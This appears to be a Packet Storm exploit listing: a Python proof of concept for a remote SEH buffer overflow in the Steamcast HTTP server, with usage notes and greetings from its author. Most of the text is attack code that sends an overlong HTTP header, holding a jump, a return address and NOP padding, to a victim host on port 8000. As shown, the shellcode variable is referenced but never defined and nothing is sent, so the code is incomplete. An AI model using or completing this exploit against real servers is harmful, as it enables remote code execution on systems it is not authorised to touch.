Steamcast Buffer Overflow

Type packetstorm
Reporter His0k4
Modified 2009-04-14T00:00:00


#[*] Usage : [victime_ip]  
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]  
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.   
#[*] Tested on : Xp sp2 (fr)  
#[*] Exploited by : His0k4  
#[*] Greetings : All friends & muslims HaCkErs (DZ),,  
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D  
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p  
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.  
import sys, socket  
import struct  
host = sys.argv[1]  
port = 8000  
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub  
exploit = "\x41"*1003 + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellcode  
while 1:  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
head = "GET / HTTP/1.1\r\n"  
head += "Host: "+host+"\r\n"  
head += exploit+"\r\n"  
head += "\r\n\r\n"